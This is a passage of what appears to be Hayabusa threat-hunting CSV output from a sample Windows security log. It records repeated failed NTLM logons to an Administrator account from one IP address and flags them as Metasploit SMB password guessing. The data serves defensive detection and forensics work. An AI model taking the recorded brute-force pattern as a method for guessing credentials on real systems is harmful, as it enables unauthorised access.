Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
